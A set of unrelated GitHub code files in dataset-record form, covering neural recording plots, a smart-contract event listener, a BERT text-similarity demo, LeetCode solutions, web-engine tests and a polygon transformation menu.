bl.segments[0].spiketrains[chn_ix]\n plt.plot([x[0], x[-1]], [2, 2], color=\"black\")\n for spike in st:\n if spike < t_start or spike > (t_start + dur * pq.s):\n continue\n spike = spike - t_start\n plt.plot([spike, spike], [1.6, 2.4], color=\"black\", linewidth=1)\n\n # 3. convert to frames\n frames = np.zeros(int(x[-1] / binsize))\n for i in range(len(frames)):\n frames[i] = len(np.where(np.logical_and((st - t_start) > (i * binsize), (st - t_start) < (i + 1) * binsize))[0])\n x = np.array(list(range(len(frames) + 1))) / len(frames) * x[-1]\n plt.plot([x[0], x[-1]], [1, 1], color=\"black\")\n plt.plot([x[0], x[-1]], [0, 0], color=\"black\")\n for i in range(len(x)):\n plt.plot([x[i], x[i]], [0, 1], color=\"black\")\n if i < len(frames):\n plt.annotate(str(frames[i].astype(int)), (x[i] + 0.05, 0.4), size=30)\n plt.ylabel(\"Frames Spikes Signal \", fontsize=18)\n plt.xticks([])\n plt.yticks([])\n\n\ndef plot_frames_lfp(bl, fs, dt, dur=1):\n # SETUP\n chn_ix = np.random.randint(64)\n t_start = np.random.randint(60)\n\n y = bl.segments[0].analogsignals[0][t_start * fs:int((t_start + dur) * fs), chn_ix]\n signal = y / max(y.max(), np.abs(y.min()))\n\n from scipy.signal import welch\n fs = 500\n # 1. raw signal with threshold\n offset = 3.5\n signal = signal + offset\n x = np.linspace(0, len(signal) / fs, len(signal))\n plt.plot(x, signal, color=\"black\")\n plt.plot([0, x[-1]], [offset, offset], color=\"grey\")\n\n # 2. plot spectrogram\n frames = []\n for i in range(int(x[-1] / dt)):\n signal_part = signal[int(i * dt * fs):int((i + 1) * dt * fs)]\n frames.append(welch(signal_part.reshape(signal_part.shape[0]), fs=fs)[1][:6])\n frames = np.array(frames)\n # 1.1 to 2.4\n cmap = plt.get_cmap(\"viridis\")\n frames = frames - np.min(frames)\n frames = frames / np.max(frames)\n height = (2.4 - 1.3) / frames.shape[1]\n for i in range(frames.shape[0]):\n for j in range(frames.shape[1]):\n x1 = i * dt\n x2 = (i + 1) * dt\n y1 = j * height + 1.3\n y2 = (j + 1) * height + 1.3\n plt.fill([x1, x2, x2, x1], [y1, y1, y2, y2], color=cmap(frames[i, j]))\n\n # 3. 
convert to frames (total power)\n frames = np.zeros(int(x[-1] / dt))\n for i in range(len(frames)):\n signal_part = signal[int(i * dt * fs):int((i + 1) * dt * fs)]\n frames[i] = np.sum(welch(signal_part.reshape(signal_part.shape[0]), fs=fs)[1])\n frames[i] = int(frames[i] * 1000) / 100\n x = np.array(list(range(len(frames) + 1))) / len(frames) * x[-1]\n plt.plot([x[0], x[-1]], [1, 1], color=\"black\")\n plt.plot([x[0], x[-1]], [0, 0], color=\"black\")\n for i in range(len(x)):\n plt.plot([x[i], x[i]], [0, 1], color=\"black\")\n if i < len(frames):\n plt.annotate(str(frames[i]), (x[i] + 0.05, 0.4), size=23)\n plt.ylabel(\"Frames Spectrogram Signal \", fontsize=18)\n plt.xticks([])\n plt.yticks([])\n\n\ndef plot_frames_MUAe(bl, fs, dur):\n # SETUP\n chn_ix = np.random.randint(64)\n t_start = np.random.randint(0, 100)\n\n y = bl.segments[0].analogsignals[0][t_start * fs:int((t_start + dur) * fs), chn_ix]\n signal = y / max(y.max(), np.abs(y.min()))\n\n # 1. raw signal with threshold\n offset = 0.7\n signal = signal + offset\n x = np.linspace(0, len(signal) / fs, len(signal))\n plt.plot(x, signal, color=\"black\")\n plt.plot([x[0], x[-1]], [np.mean(signal), np.mean(signal)], color=\"grey\")\n\n # 2. convert to frames (discrete signal)\n signal = signal - offset\n plt.scatter(x, signal, color=\"black\", s=3)\n\n plt.ylabel(\"Frames Signal\", fontsize=20)\n plt.xticks([])\n plt.yticks([])\n\n\n# figure b) - cors and inter cors\ndef plot_cors(path, chn):\n \"\"\"\n Plot correlation map\n :param path: path to the pickled correlation-map results\n :param chn: seed channel number (1-based)\n :return: the pcolormesh handle\n \"\"\"\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n cors = data[\"correlation_maps\"]\n\n with open(\"layout.pkl\", \"rb\") as f:\n layout = pickle.load(f)\n\n corr_map = np.full((8, 8), 0.)\n for x in range(8):\n for y in range(8):\n corr_map[x, y] = cors[chn - 1, layout[x, y] - 1]\n\n plt.gca().set_aspect('equal', 'box')\n g = plt.pcolormesh(corr_map, cmap=\"RdBu_r\", vmin=-1, vmax=1)\n # plt.colorbar(g, ticks=[-1, 0, 1], shrink=0.5, pad=0.08,\n # location=\"bottom\", orientation=\"horizontal\", label=\"correlation\")\n for x in range(8):\n for y in range(8):\n if layout[x, y] == chn:\n plt.scatter(y + 0.5, x + 0.5, color=\"yellow\", edgecolors=\"black\", label=\"seed channel\")\n # plt.legend(bbox_to_anchor=(0.5, -0.1), loc='lower center', ncol=1)\n _ = plt.xticks([])\n _ = plt.yticks([])\n return g\n\n\ndef plot_inter_cors(path, chn):\n \"\"\"\n Plot interpolated correlation map with removed untuned channels\n :param path: path to the pickled correlation-map results\n :param chn: seed channel number (1-based)\n :return:\n \"\"\"\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n inter = data[\"interpolated_correlation_maps\"]\n rins = data[\"real_channel_inds\"]\n\n plt.gca().set_aspect('equal', 'box')\n cmap = plt.get_cmap(\"RdBu_r\").copy()\n cmap.set_under(color=\"grey\")\n inter_corr_map = inter[:, chn - 1].reshape((65, 65))\n\n plt.pcolormesh(inter_corr_map.T, cmap=cmap, vmin=-1, vmax=1)\n plt.xticks([])\n plt.yticks([])\n\n plt.scatter(rins[chn - 1, 0] + 0.5, rins[chn - 1, 1] + 0.5, color=\"yellow\", edgecolors=\"black\")\n\n\n# figure c) - pca plane\ndef plot_pca(path):\n \"\"\"\n Plot projected interpolated correlation vectors onto PCs (PCs defined by path)\n :param path: path to the pickled PCA results\n :return:\n \"\"\"\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n points = data[\"points_pca_plane\"]\n center = points.mean(axis=0)\n p = points - center\n angle = np.arctan(p[:, 0] / p[:, 1])\n angle[p[:, 1] < 0] += np.pi\n angle -= angle.min()\n labels = angle / 2\n g = plt.scatter(points[:, 0], points[:, 1], 
c=labels, cmap=\"hsv\", vmin=0, vmax=np.pi, s=25, edgecolors=\"grey\")\n cb = plt.colorbar(g, ticks=[0, 3.14], shrink=0.8, pad=0.12,\n location=\"right\", orientation=\"vertical\")\n cb.set_label(label=\"angle\", fontsize=18)\n outline = max(np.max(np.abs(points[:, 0])), np.max(np.abs(points[:, 1])))\n plt.plot([0, 0], [-outline, outline], color=\"black\")\n plt.plot([-outline, outline], [0, 0], color=\"black\")\n plt.xlabel(\"PC3\", fontsize=20)\n plt.ylabel(\"PC4\", fontsize=20)\n plt.gca().set_aspect('equal', 'box')\n plt.xticks([])\n plt.yticks([])\n\n\n# figure d) - spont. map, OP map, test\ndef plot_spont_map(path):\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n spont = data[\"test\"]\n cmap = plt.get_cmap(\"hsv\").copy()\n cmap.set_under(color=\"grey\")\n plt.gca().set_aspect('equal', 'box')\n plt.pcolormesh(spont, cmap=cmap, vmin=0)\n plt.title(\"Spontaneous map\", fontsize=20, pad=10)\n plt.xticks([])\n plt.yticks([])\n\n\ndef plot_ori_map(path):\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n ori = data[\"reference\"]\n cmap = plt.get_cmap(\"hsv\").copy()\n cmap.set_under(color=\"grey\")\n plt.gca().set_aspect('equal', 'box')\n plt.pcolormesh(ori, cmap=cmap, vmin=0)\n plt.title(\"Orientation preference map\", fontsize=20, pad=10)\n plt.xticks([])\n plt.yticks([])\n\n\n# figure e)\ndef plot_hist(path):\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n plt.title(f\"Similarity scores (p={int(data['percentile'] * 100) / (100 * 100)})\", fontsize=20, pad=10)\n h = plt.hist(data['control_scores'], bins=100, color=\"grey\")[0]\n plt.plot([data['test_score'], data['test_score']], [0, np.mean(h)], color=\"black\", linewidth=5)\n # x, y = KDE(data['control_scores'], 1)\n # y = y / np.max(y) * np.max(h)\n # plt.plot(x, y, color=\"black\")\n plt.xticks([])\n plt.yticks([])\n\n\ndef final_figure(res_path, method, monkey, arraynr, params):\n \"\"\"\n Plot figure for each method in detailed analysis of L13\n :param res_path: path to correlation maps folder\n :param method: MUA, MUAe, LFP, nLFP\n :param monkey: L or A\n :param arraynr: Array ID\n :param params:\n :return:\n \"\"\"\n # SETUP\n cors_path = f\"{res_path}/correlation_maps_pool_monkey_{monkey}{arraynr}_{method}_spont.pkl\"\n pca_path = f\"{res_path}/pca_communities_monkey_{monkey}{arraynr}_{method}_spont.pkl\"\n test_path = f\"{res_path}/testing/testing_results_{monkey}{arraynr}_{method}_{params['remove_PCA_dims']}.pkl\"\n\n # extract spikes a)\n plt.figure(figsize=(28, 16))\n from extract_signal import LFP, nLFP, MUAe, MUA\n\n # load signal\n path = \"/home/matej/Desktop/Bakalarka/final_figs/recordings/2_final_recording_after_stimulation_005.ns6\"\n if method == \"MUA\":\n fs = 30000\n bl = MUA(path, -3)\n dt = 0.1\n elif method == \"nLFP\":\n fs = 500\n bl = nLFP(path, -1)\n dt = 0.3\n elif method == \"LFP\":\n fs = 500\n bl = LFP(path)\n dt = 0.2\n elif method == \"MUAe\":\n fs = 1000\n bl = MUAe(path)\n\n # plot extracted frames (a)\n plt.subplot(2, 3, 1)\n if method in [\"MUA\", \"nLFP\"]:\n plot_extracted_spikes(bl, fs, dt, dur=1.5)\n elif method == \"LFP\":\n plot_frames_lfp(bl, fs, dt)\n if method == \"MUAe\":\n plot_frames_MUAe(bl, fs, 0.1)\n for loc in [\"left\", \"top\"]:\n plt.gca().spines[loc].set_visible(False)\n else:\n for loc in [\"left\", \"right\", \"top\", \"bottom\"]:\n plt.gca().spines[loc].set_visible(False)\n\n # plot cors and interpolated cors (b)\n chns = [32, 51]\n loc = [3, 9]\n for i in range(2):\n plt.subplot(4, 6, loc[i])\n if 
i == 0:\n plt.title(\"Correlation map\", fontsize=20)\n g = plot_cors(cors_path, chns[i])\n plt.subplot(4, 6, loc[i] + 1)\n if i == 0:\n plt.title(\"Interpolated map\", fontsize=20)\n plot_inter_cors(cors_path, chns[i])\n\n plt.subplot(2, 3, 1)\n axs = [plt.subplot(4, 6, loc[i] + j) for i in range(2) for j in range(2)]\n cb = plt.colorbar(g, ax=axs, ticks=[-1, 0, 1], shrink=0.8, pad=0.08,\n location=\"bottom\", orientation=\"horizontal\")\n cb.set_label(label=\"Correlation\", fontsize=16)\n\n # plot pca projection (c)\n plt.subplot(2, 3, 3)\n plot_pca(pca_path)\n\n # plot spontaneous map, orientation map and histogram (d)\n plt.subplot(2, 3, 4)\n plot_spont_map(test_path)\n plt.subplot(2, 3, 5)\n plot_ori_map(test_path)\n plt.subplot(2, 3, 6)\n plot_hist(test_path)\n\n plt.savefig(f\"final_.png\")\n\n\ndef correlation_figure(path_to_cors):\n from scipy.stats import pearsonr\n correlation_maps = {}\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n with open(f\"{path_to_cors}/correlation_maps_pool_monkey_L13_{m}_spont.pkl\", \"rb\") as f:\n correlation_maps[m] = pickle.load(f)\n\n # load channel coords\n coords = {}\n with open(\"layout.pkl\", \"rb\") as f:\n layout = pickle.load(f)\n for r in range(8):\n for c in range(8):\n coords[layout[r, c]] = (r, c)\n\n # load correlation values, CMs correlations and distances\n c, cm, d = {}, {}, {}\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n cors = correlation_maps[m][\"correlation_maps\"]\n for chn1 in range(64):\n for chn2 in range(chn1 + 1, 64):\n if chn1 == 0 and chn2 == 1:\n c[m] = []\n cm[m] = []\n d[m] = []\n c[m].append(cors[chn1, chn2])\n tmp = pearsonr(cors[:, chn1], cors[:, chn2])[0]\n cm[m].append(-2 if np.isnan(tmp) else tmp)\n d[m].append(np.linalg.norm(np.array(coords[chn1 + 1]) - np.array(coords[chn2 + 1])))\n c[m] = np.array(c[m])\n cm[m] = np.array(cm[m])\n d[m] = np.array(d[m])\n\n # create cors x cm cors line and plot it\n plt.figure(figsize=(26, 10))\n plt.subplot(1, 2, 1)\n x = {}\n y = {}\n std = {}\n segments = 40\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n x[m], y[m], std[m] = [], [], []\n x_ = c[m]\n y_ = cm[m]\n bin_x = np.linspace(np.min(x_), np.max(x_), segments)\n for j in range(bin_x.shape[0] - 1):\n tmp = y_[np.where(np.logical_and(x_ >= bin_x[j], x_ < bin_x[j + 1]))]\n if tmp.shape[0] > 0:\n x[m].append(bin_x[j] + ((bin_x[j + 1] - bin_x[j]) / 2))\n y[m].append(np.mean(tmp))\n std[m].append(np.std(tmp))\n x[m], y[m], std[m] = np.array(x[m]), np.array(y[m]), np.array(std[m])\n _ = plt.plot(x[m], y[m], label=m, linewidth=4)\n _ = plt.fill_between(x[m], y[m] - std[m], y[m] + std[m], color=(0.2, 0.4, 0.7, 0.2))\n _ = plt.xlabel(\"Channel correlations\", fontsize=25)\n _ = plt.ylabel(\"Map correlations\", fontsize=25)\n if i == 3:\n _ = plt.legend(fontsize=15)\n plt.ylim(-1, 1)\n\n # plot cors x distance\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n x = np.unique(d[m])\n y = np.zeros((x.shape[0], 2))\n std = np.zeros((x.shape[0], 2))\n for ix in range(x.shape[0]):\n for j in range(2):\n data = [cm[m], c[m]][j][np.where(d[m] == x[ix])]\n data = data[np.where(data >= -1)]\n y[ix, j] = np.mean(data)\n std[ix, j] = np.std(data)\n loc = [3, 4, 7, 8]\n plt.subplot(2, 4, loc[i])\n plt.plot(x, y[:, 0], color=\"red\", label=\"Map correlations\", linewidth=2)\n plt.plot(x, y[:, 1], color=\"blue\", label=\"Channel correlations\", linewidth=2)\n colors = [(255 / 256, 190 / 256, 171 / 256), (177 / 256, 201 / 256, 234 / 256)]\n for j in 
range(2):\n plt.fill_between(x, y[:, j] - std[:, j], y[:, j] + std[:, j], color=colors[j], alpha=0.5)\n plt.ylim(-0.4, 1)\n x = np.linspace(1, 10, 10)\n plt.xticks(x, (x * 400).astype(int))\n # plt.yticks([-1, -0.5, 0, 0.5, 1])\n plt.title(m, fontsize=20)\n if i == 0:\n plt.ylabel(\"Correlation values\", fontsize=18)\n if i == 1:\n plt.legend(fontsize=18)\n if i == 3:\n plt.xlabel(\"Distance (um)\", fontsize=18)\n plt.savefig(\"final/dist_.png\")\n","repo_name":"matejvol/spontaneous-map-inference","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":17961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39341658768","text":"import time\nfrom threading import Thread\nfrom openapi_server.contract.eventListening.abstractSubject import AbstractSubject\nfrom openapi_server.contract import contract\nimport logging\n\nlog = logging.getLogger(\"scListener\")\n\n\nclass SmartContractEventListener(AbstractSubject):\n \"\"\"\n This class is responsible for Event listening of smart contract events.\n\n Observers attach themselves to this event listener, which creates a thread each for the filtering of events.\n the update function of the affected observer is then called.\n\n It follows the observer pattern as a guideline only, since notifyObserver is not used,\n as attaching an observer starts event listening immediately, and only a single event is to be updated.\n\n The Smart Contract Event Listening using threads is based on the example of\n https://web3py.readthedocs.io/en/stable/filters.html#asynchronous-filter-polling\n \"\"\"\n\n def __init__(self, sc_contract):\n self.contract = sc_contract\n self._observer = set()\n\n # AbstractSubject overrides\n\n def attach(self, observer):\n self._observer.add(observer)\n self._evt_listen(observer)\n\n def detach(self, observer):\n self._observer.remove(observer)\n worker = observer.worker\n worker.join()\n\n def notifyObservers(self, *args, **kwargs):\n for o in self._observer:\n o.notify(self, *args, **kwargs)\n\n # ---------\n\n def _evt_listen(self, observer):\n \"\"\"\n create a contract event filter for an observer and set up a new thread to start event listening\n \"\"\"\n event = observer.event\n event_filter = self.contract.events[event].createFilter(fromBlock=\"latest\")\n worker = Thread(\n target=self._event_loop, args=(event_filter, observer), daemon=True\n )\n # store to join later\n observer.worker = worker\n worker.start()\n\n def _event_loop(self, event_filter, observer) -> None:\n \"\"\"\n gets new events based on the type of event this thread is listening to\n :param event_filter:\n :param poll_interval: int\n :return: None\n \"\"\"\n while True:\n for event in event_filter.get_new_entries():\n observer.update(event)\n time.sleep(observer.poll_interval)\n\n\neventListener = SmartContractEventListener(sc_contract=contract)\n","repo_name":"blockchain-v/bcv-backend","sub_path":"openapi_server/contract/eventListening/eventListenerSubject.py","file_name":"eventListenerSubject.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12296587066","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nimport tensorflow_text as text\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ntext_input = tf.keras.layers.Input(shape=(), dtype=tf.string)\npreprocessor = 
hub.KerasLayer(\"https://tfhub.dev/tensorflow/bert_en_uncased_preprocess/3\")\nencoder_inputs = preprocessor(text_input)\nencoder = hub.KerasLayer(\"https://tfhub.dev/tensorflow/bert_en_uncased_L-24_H-1024_A-16/3\", trainable=True)\noutputs = encoder(encoder_inputs)\npooled_output = outputs[\"pooled_output\"]\nsequence_output = outputs[\"sequence_output\"]\n\nembedding_model = tf.keras.Model(text_input, pooled_output)\n\nquery = tf.constant([\"brain\"])\nquery_embedding = embedding_model(query).numpy()\nprint(query_embedding)\n\ndocuments = [\n { 'id': 1, 'text': \"cardiac surgeon\" },\n { 'id': 2, 'text': \"neuroscientist\" },\n { 'id': 3, 'text': \"brain surgeon\" }\n]\nprint(documents)\n\n# Apply .numpy() to the model output (as for the query above), not to the input constant.\ndocument_embeddings = list(\n map(lambda doc:\n { 'id': doc['id'], 'text': embedding_model(tf.constant([doc['text']])).numpy() },\n documents\n )\n)\nprint(document_embeddings)\n\ncosine_similarities = list(\n map(lambda doc:\n { 'id': doc['id'], 'score': cosine_similarity(query_embedding, doc['text'])[0][0] },\n document_embeddings\n )\n)\nprint(cosine_similarities)\n\ncosine_similarities.sort(key = lambda doc: doc['score'], reverse=True)\nprint(cosine_similarities)\n\nprint(\"Documents:\")\nprint(documents)\n\nresults = list(\n map(lambda score:\n { 'id': score['id'], 'text': list(map(lambda doc: doc['text'], filter(lambda doc: doc['id'] == score['id'], documents)))[0] },\n cosine_similarities\n )\n)\nprint(\"\")\nprint(\"Ranked by most similar to search query: '\" + query.numpy()[0].decode('ascii') + \"'\")\nprint(results)\n","repo_name":"mattmoore/ai-playground","sub_path":"nlp/bert-embedding/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29545074201","text":"#\n# @lc app=leetcode id=123 lang=python3\n#\n# [123] Best Time to Buy and Sell Stock III\n#\n# https://leetcode.com/problems/best-time-to-buy-and-sell-stock-iii/description/\n#\n# algorithms\n# Hard (34.68%)\n# Likes: 1378\n# Dislikes: 58\n# Total Accepted: 169.9K\n# Total Submissions: 485.3K\n# Testcase Example: '[3,3,5,0,0,3,1,4]'\n#\n# Say you have an array for which the i^th element is the price of a given\n# stock on day i.\n#\n# Design an algorithm to find the maximum profit. You may complete at most two\n# transactions.\n#\n# Note: You may not engage in multiple transactions at the same time (i.e., you\n# must sell the stock before you buy again).\n#\n# Example 1:\n#\n#\n# Input: [3,3,5,0,0,3,1,4]\n# Output: 6\n# Explanation: Buy on day 4 (price = 0) and sell on day 6 (price = 3), profit =\n# 3-0 = 3.\n# Then buy on day 7 (price = 1) and sell on day 8 (price = 4), profit = 4-1 =\n# 3.\n#\n# Example 2:\n#\n#\n# Input: [1,2,3,4,5]\n# Output: 4\n# Explanation: Buy on day 1 (price = 1) and sell on day 5 (price = 5), profit =\n# 5-1 = 4.\n# Note that you cannot buy on day 1, buy on day 2 and sell them later, as you\n# are\n# engaging multiple transactions at the same time. You must sell before buying\n# again.\n#\n#\n# Example 3:\n#\n#\n# Input: [7,6,4,3,1]\n# Output: 0\n# Explanation: In this case, no transaction is done, i.e. max profit = 0.\n#\n#\n\n# tags dp\n#\n# 1. idea generalize to k transactions\n# 2. write dp formula O(k.n^2)\n#\n# Let f(i, k) be the best score at i with at most k transactions\n#\n# f(i, k) = max( f(i-1, k),\n# max(prices[i] - prices[j] + f(j, k-1)), j < i)\n# f(0, k) = 0\n# f(i, 0) = 0\n#\n# 3. 
Optimize the formula (trick)\n#\n# One can rewrite the formula\n#\n# f(i, k) = max( f(i-1, k),\n# prices[i] - min(prices[j] - f(j, k-1)), j < i)\n#\n# And we realize that the min can be incrementally computed. This is the\n# same optimization we have in the case with only one transaction.\n#\n# 4. Space optimization TODO\n\n\n# @lc code=start\nfrom typing import List\n#\n# Non-optimized solution TLE\n# class Solution:\n# def maxProfit(self, prices: List[int]) -> int:\n# if not prices:\n# return 0\n# n = len(prices)\n# memo = [[ 0 for _ in range(3) ] for _ in range(n) ]\n# for k in range(1, 3):\n# for i in range(1, n):\n# res = max(prices[i] - prices[j] + memo[j][k-1] for j in range(i))\n# res = max(res, memo[i-1][k])\n# memo[i][k] = res\n# return memo[n-1][2]\n\n# Time complexity is now O(k.n)\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if not prices:\n return 0\n n = len(prices)\n memo = [[ 0 for _ in range(3) ] for _ in range(n) ]\n for k in range(1, 3):\n cur_min = prices[0]\n for i in range(1, n):\n cur_min = min(cur_min, prices[i-1] - memo[i-1][k-1])\n memo[i][k] = max(prices[i] - cur_min, memo[i-1][k])\n return memo[n-1][2]\n# @lc code=end\n\n","repo_name":"phlalx/algorithms","sub_path":"leetcode/123.best-time-to-buy-and-sell-stock-iii.py","file_name":"123.best-time-to-buy-and-sell-stock-iii.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3552798510","text":"# 1) using a method\nword = input()\nw_dict = {}\n\nfor i in word:\n if w_dict.get(i) is None:\n w_dict[i] = word.count(i)\n\nfor k, v in w_dict.items():\n print(k, v, sep=' ')\n\n\n# 2)\nword = input()\nw_dict = {}\n\nfor char in word:\n if not char in w_dict:\n w_dict[char] = 1\n else:\n w_dict[char] = w_dict[char] + 1\n\nfor k, v in w_dict.items():\n print(k, v)\n\n\n# 3) simple for loop\nword = input()\nw_dict = {}\n\nfor i in word:\n w_dict[i] = 0\n\nfor i in word:\n w_dict[i] += 1\n\nfor k, v in w_dict.items():\n print(k, v)\n\n\n# 4)\nword = input()\nresult = {}\n\nfor char in word:\n result[char] = result.get(char, 0) + 1\n\nfor k, v in result.items():\n print(k, v)\n","repo_name":"w00ye0l/TIL","sub_path":"PythonPractice/python_prac_18.py","file_name":"python_prac_18.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"15961477911","text":"from typing import List\n\n\nclass Solution:\n def setZeroes(self, matrix: List[List[int]]) -> None:\n row = []\n cols = []\n for i, c in enumerate(matrix):\n for j, r in enumerate(c):\n if r == 0:\n row.append(i)\n cols.append(j)\n\n for i in row:\n for j in range(len(matrix[0])):\n matrix[i][j] = 0\n \n for j in cols:\n for i in range(len(matrix)):\n matrix[i][j] = 0\n print(matrix)\n\nif __name__=='__main__':\n Solution().setZeroes(matrix=[[1,1,1,1],[1,0,1,1],[1,0,0,1]])\n \n \n ","repo_name":"jeminkachhadiya/LeetCode","sub_path":"SDE/set_matrix_zeroes.py","file_name":"set_matrix_zeroes.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21031221512","text":"from pdebug.utils.env import VISDOM_INSTALLED\nfrom pdebug.utils.web_engine import ImageEngine, ThreeEngine\n\nimport numpy as np\nimport pytest\n\n\ndef test_three_engine():\n js_code = \"\"\"\nconst dir = new THREE.Vector3( 1, 2, 0 );\ndir.normalize();\n\nconst origin = new THREE.Vector3( 0, 0, 0 );\nconst length = 1;\nconst color = 
0xffff00;\n\nconst arrowHelper = new THREE.ArrowHelper( dir, origin, length, color);\nscene.add( arrowHelper );\n\"\"\"\n engine = ThreeEngine(\"simple\")\n engine.render(js_code=js_code)\n # engine.serve(port=5160)\n\n\ndef test_image_engine(tmpdir):\n engine = ImageEngine(res_dir=tmpdir)\n image = np.zeros((100, 100, 3), dtype=np.uint8)\n image[:, :, 0] = 255\n engine.add_image(image)\n # engine.serve(port=5160)\n\n\ndef test_image_engine_sync():\n engine = ImageEngine(serve_first=True)\n image = np.zeros((100, 100, 3), dtype=np.uint8)\n image[:, :, 0] = 255\n engine.add_image(image)\n engine.serve(port=5160)\n\n\ndef test_parallel():\n engine = ImageEngine()\n\n from pdebug.contrib import mp\n\n @mp(nums=4)\n def _process(process_id, r):\n for i in r:\n print(f\"{i} / 8\")\n image = np.zeros((100, 100, 3), dtype=np.uint8)\n image[:, :, 0] = 100 + i * 5\n engine.add_image(image, prefix=f\"{process_id}_{i:06d}\")\n\n _process(list(range(8)))\n # engine.serve(port=5160)\n","repo_name":"DuinoDu/pdebug","sub_path":"pdebug/utils/tests/test_web_engine.py","file_name":"test_web_engine.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23453017693","text":"import numpy as np \nimport matplotlib.pyplot as plt\nfrom Libreria.Functions import line, traslacion, rotacion, escalado\nimport matplotlib\nfrom math import pi, cos, sin\n\nmatplotlib.use('TKAgg')\n\nN = 100\nmatriz_linea = np.zeros((N, N))\nlinea = []\n\n\ndef imprimir_linea():\n for c in linea:\n matriz_linea[c[0], c[1]] = 1\n plt.imshow(matriz_linea)\n plt.colorbar()\n plt.show()\n\ndef draw_point(p = (0, 0)):\n x, y = p\n if x > 0 and y > 0: \n linea.append([y, x])\n\ndef paint_lines(line):\n for i in line: \n draw_point(i)\n\ndef generar_poligono(n = 0, r = 0):\n if n < 3: return\n teta, t_aux = (360 / n) * pi / 180, (45) * pi / 180\n puntos, dx, dy = [], 10, 10\n for _ in range(n):\n x, y = round(r * cos(t_aux) + dx), round(r * sin(t_aux) + dy)\n t_aux += teta\n puntos.append((x, y))\n return puntos \n\ndef draw_poligono(puntos):\n l = len(puntos)\n points_direction = [ [ puntos[i], puntos[i + 1 if i < l - 1 else 0] ] for i in range(l) ]\n ymax = max( [ y for x, y in puntos ] ) \n points_lines = [ j for i in points_direction for j in line(i[0], i[1]) ] \n paint_lines(points_lines) \n values_x = []\n for vy in range(ymax):\n values_x = [ x for (x, y) in points_lines if y == vy ]\n if len(values_x) == 0: continue\n for xp in range(min(values_x), max(values_x)):\n draw_point((xp, vy))\n values_x = []\n imprimir_linea()\n\ndef validar_poligono(poligono):\n if len(poligono) == 0: \n print('You must create a polygon first')\n return False\n return True\n\ndef draw_poligono_msj(poligono, msj):\n print(poligono)\n print(msj)\n draw_poligono(poligono)\n\ndef menu():\n poligono = []\n while True:\n op = int(input('\\nSelect an option:\\n1. Create polygon\\n2. Apply translation\\n3. Apply scaling\\n4. Apply rotation\\n5. Exit\\n'))\n if op == 5: return\n elif op == 1:\n n = int(input('Enter the number of sides: '))\n if n < 3: \n print('The number of sides must be at least 3')\n break\n else:\n r = int(input('Enter the radius: '))\n if r > 0: poligono = generar_poligono(n, r)\n else: \n print('The radius must be positive')\n break\n draw_poligono_msj(poligono, 'The created polygon is:\\n')\n elif op == 2:\n if validar_poligono(poligono):\n t = tuple(list(map(int, input('Enter the translation vector: ').split())))\n poligono_trasladado = [ traslacion(p, t) for p in poligono ]\n draw_poligono_msj(poligono_trasladado, 'The translated polygon is: ')\n elif op == 3:\n if validar_poligono(poligono):\n e = tuple(list(map(int, input('Enter the scaling vector: ').split())))\n pf = poligono[0]\n poligono_escalado = [ escalado(p, pf, e) for p in poligono ]\n draw_poligono_msj(poligono_escalado, 'The scaled polygon is: ')\n elif op == 4:\n if validar_poligono(poligono):\n pf = tuple(list(map(int, input('Enter the reference point coordinates: ').split())))\n teta = int(input('Enter the angle: '))\n poligono_rotado = [ rotacion(p, pf, teta) for p in poligono ] \n draw_poligono_msj(poligono_rotado, 'The rotated polygon is: ')\n else: \n print('Please select a valid option')\n \nif __name__ == '__main__':\n menu()","repo_name":"ChepeAicrag/Graficacion","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29998043250","text":"import numpy as np \nfrom scipy import signal\nimport rbdl\nimport csv\nfrom numpy import genfromtxt\n\n\nimport matplotlib.pyplot as plt\n\nplotInputData = True\nplotOutput = True\n\n#Preprocessing flags\nresampleFrequency = 100\n# All of the input data is resampled to the above rate. This step is included\n# so that data coming from different equipment, at different sample rates, \n# is properly handled.\n\nfilterFreq = 7.5\n# The inverse-kinematics data is filtered using a 2nd order Butterworth filter\n# in the forwards and backwards direction (so there is no phase introduced).\n# This is the 3dB cut-off frequency of the filter.\n\n\n#Read in the model\n# The model name convention follows the one in OpenSim:\n# gait: model intended for walking simulations\n# 9: DoF\n# 12: Number of muscles. 
